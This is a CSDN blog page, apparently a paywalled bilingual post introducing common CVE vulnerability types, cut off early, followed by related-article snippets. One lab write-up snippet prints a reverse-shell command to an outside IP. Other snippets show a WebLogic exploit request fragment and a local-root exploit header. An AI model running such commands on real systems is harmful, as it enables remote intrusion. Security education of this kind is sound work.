工程师 - CVE类型

原创 于 2024-08-04 12:50:34 发布 · 1.3k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

CVE 类型是指可在通用漏洞和暴露(CVE)系统中识别和记录的不同类别或等级的漏洞和暴露。这些类别有助于了解漏洞的性质和潜在影响。以下是一些常见的 CVE 类型:

CVE types refer to the different categories or classes of vulnerabilities and exposures that can be identified and documented in the Common Vulnerabilities and Exposures (CVE) system. These categories help in understanding the nature and potential impact of a vulnerability. Here are some common types of CVEs:

1. 缓冲区溢出:

    * 说明: 当程序向缓冲区写入的数据超过其容量时发生。

    * 影响: 可能导致任意代码执行、崩溃或系统受损。

1. Buffer Overflow:

    * Description: Occurs when a program writes more data to a buffer than it can hold.

    * Impact: Can lead to arbitrary code execution, crashes, or system compromise.

2. 跨站脚本 (XSS):

    * 描述: 允许攻击者在其他用户浏览的网页中注入恶意脚本。

    * 影响: 可窃取会话 cookie、篡改网站或将用户重定向到恶意网站。

2. Cross-Site Scripting (XSS):

    * Description: Allows attackers to inject malicious scripts into web pages viewed by other users.

    * Impact: Can steal session cookies, deface websites, or redirect users to malicious sites.

3. SQL 注入:

   &n

最低0.47元/天 解锁文章
CVE10大漏洞总结【网络安全
heikeyouyou的博客
05-19 3667
网络安全cve十大漏洞总结
linux漏洞类型,CVE-2019-13272
weixin_30663789的博客
05-13 400
// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)// Uses pkexec technique// ---// Original discovery and exploit author: Jann Horn// - https://bugs.chromium.org/p/project-zero/issue...
weblogic反序列化漏洞(CVE-2017-10271)
MD@@nr丫卡uer
01-29 271
受影响版本 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 漏洞利用 1:初步判断访问 http://x.x.x.x:7001/wls-wsat/CoordinatorPortType11, 存在下图则说明可能存在漏洞 2:构造POST包进行测试,写入test.txt POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Win
暴雷(CVE-2012-1889)漏洞分析报告
ZK_1874的博客
10-28 2876
暴雷(CVE-2012-1889)漏洞分析报告
安全漏洞概念及分类
11-21
本文是一个安全漏洞相关的科普,介绍安全漏洞的概念认识,漏洞在几个维度上的分类及实例展示。
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3417
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
安全漏洞】Emissary 的SSRF漏洞(CVE-2021-32639)发现过程
HBohan的博客
09-09 782
导语:通过在Emissary项目上运行标准的CodeQL查询集,我发现了之前报告的任意文件泄露(CVE-2021-32093)。 通过在Emissary项目上运行标准的CodeQL查询集,我发现了之前报告的任意文件泄露(CVE-2021-32093),但也发现了新的漏洞: 不安全的反序列化漏洞 (CVE-2021-32634); 服务器端请求伪造漏洞(CVE-2021-32639); 原始代码注入CVE (CVE-2021-32096)是由社区贡献的CodeQL查询标记的; 到目前为止,还可以通过默认的.
你是网络安全方面安全服务工程师分析CVE-2025-23363特征,建立CVE-2025-23363专属分析规则
03-02
嗯,用户让我介绍一下如何作为网络安全服务工程师分析CVE-2025-23363的特征,并建立专属分析规则。首先,我需要确认这是一个假设的CVE编号,因为2025年的漏洞现在还不存在。不过,用户可能是想了解处理这类问题的...
CVE-2024-53CVE-2024-53677 拦截器677
最新发布
08-19
用户可能是个安全运维人员或者开发工程师,正在处理Struts应用的安全加固工作。ta需要知道漏洞的具体触发条件、危害程度以及防护方案,特别是拦截器配置这种实操性内容。 从引用内容看,这个漏洞是Apache Struts的...
什么是CVE?常见漏洞和暴露列表概述
Trinity_Techologies的博客
05-18 1万+
常见漏洞和暴露(Common Vulnerability and Exposures,简称CVE)收集了已知的网络安全漏洞和暴露,以帮助您更好地保护您的嵌入式软件。 在这里,我们会阐释什么是CVECVE列表中包括哪些内容,以及它如何帮助确保您的软件是安全的。
AI Security3-通用漏洞披露(CVE: Common Vulnerabilities and Exposures)
学渣的博客
12-25 1万+
这是目录1 漏洞的来源2 漏洞分析2.1 数据来源2.2 数据分析3 举例 回顾之前的内容 逃逸攻击 投毒攻击 在前文中,我们介绍了Attack AI的基础概念,即黑客对AI发起的攻击,主要可以分为三种攻击类型,破坏模型完整性、可用性和机密性的攻击。 在本文,我们将介绍破坏模型可用性的一些攻击示例。 模型的可用性主要是指模型能够被正常使用。这一块的攻击面主要是算法系统依赖的底层框架、依赖库,攻击方式主要是对模型代码或底层依赖库的代码进行漏洞挖掘和利用,如溢出攻击、DDos攻击。 由于在野0day的信息无法
安全漏洞相关概念(CVE,CNA, CWE,CVSS,OWASP)
oscar999的专栏
10-04 4538
* CVE给发现的漏洞编号 (事后补救), CWE 旨在通过对所有已识别的缺陷和暴露进行分类(事前预防) * CVSS 用来给发现的漏洞一个严重等级的评分 * OWASP 和 CWE 每年会发布一个排名靠前的漏洞的列表。
漏洞等级标准参考建议
qq_40898302的博客
02-21 6472
2.不需要登录直接导致严重的信息泄露漏洞,包括但不限于重要数据库的SQL注入、系统权限控制不严格等导致的敏感数据泄露漏洞等。3.可能存在安全隐患但利用成本很高的漏洞,包括但不限于需要用户连续交互的敏感安全漏洞,例如:解析漏洞、可被暴力破解接口等。1.轻微信息泄露,包括但不限于路径信息泄露、svn信息泄露、phpinfo、日志文件、配置信息等。1.需要登录的重要业务敏感数据信息泄露漏洞,包括但不限于重要用户信息、配置信息、数据文件信息等。2.普通信息泄露漏洞,包括但不限于用户信息泄露和业务敏感信息泄露等。
浅谈漏洞来源(CVE,NVD,CNVD,CNNVD)
热门推荐
TT成长博客
02-23 3万+
网络安全人士可能会问这样一个问题,安全漏洞是哪里来的,什么渠道,可靠吗。那么多的安全产品,他们的漏洞库都是自己整理的吗?(怎么可能撒),虽然各安全厂商都搞自己的威胁情报中心,但是威胁情报除了自研的,很多还是靠类似公益的机构来支持,比如业界大家都知道的几个平台,我们就简单和大家掰扯掰扯吧。
什么是CVECVE漏洞应该如何防护?
m0_66326520的博客
03-25 3797
我们需要采取多重措施来保护服务器的安全性。包括深入分析漏洞、寻找并安装补丁程序、进行安全加固和配置调整,以及加强人员的安全意识和培训。只有通过综合手段加强服务器的安全性,才能有效防范黑客攻击,保护企业网络和数据的安全
漏洞预警,VMware远程代码执行漏洞的严重等级达到9.8(满分10)
qq_44005305的博客
05-22 1157
2021 年 2 月 23 日,VMware 公司发布漏洞安全公告,VMware 多个组件存在远程代码执行、堆溢出漏洞和信息泄露漏洞的高危漏洞。机器之心报道,机器之心编辑部。就在几天前,一些互联网公司监测到 VMware 官方发布安全公告,披露了包括 CVE-2021-21972、CVE-2021-21973 和 CVE-2021-21974 在内的高危漏洞。攻击者可以通过发送精心构造的恶意数据包造成远程执行代码,获取接管服务器权限,存在极大的安全隐患。
CVE公共漏洞和暴露的学习
charm_1981的博客
05-21 2万+
CVE公共漏洞和暴露原著:潘柱廷    注释:ccnupq1 CVE的产生背景随着最近一些年来在全球范围的黑客入侵不断猖獗,信息安全问题越来越严重。在对抗黑客入侵的安全技术中,实时入侵检测和漏洞扫描评估(IDnA -Intrusion Detection and Assessment)的技术和产品已经开始占据越来越重要的位置。目前实时入侵检测和漏洞扫描评估基于的主要方法还是“已知入侵手法检测”和“...
CVE-2021-3156: sudo缓冲区溢出漏洞利用
weixin_46137328的博客
01-30 1693
0x00 漏洞简述2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156,漏洞等级:高危,漏洞评分...
CVE和NVD的关系
公众号shadow sock7
05-20 1万+
经常看到某个CVE漏洞的CVE链接和NVD链接,那么他们两个都什么区别呢?CVE的官网上有写。 https://cve.mitre.org/about/cve_and_nvd_relationship.html CVE and NVD是两个不同的项目 The CVE List 由MITRE发起 as a community effort in 1999 NVD(美国国家漏洞库)是由National...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜流冰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值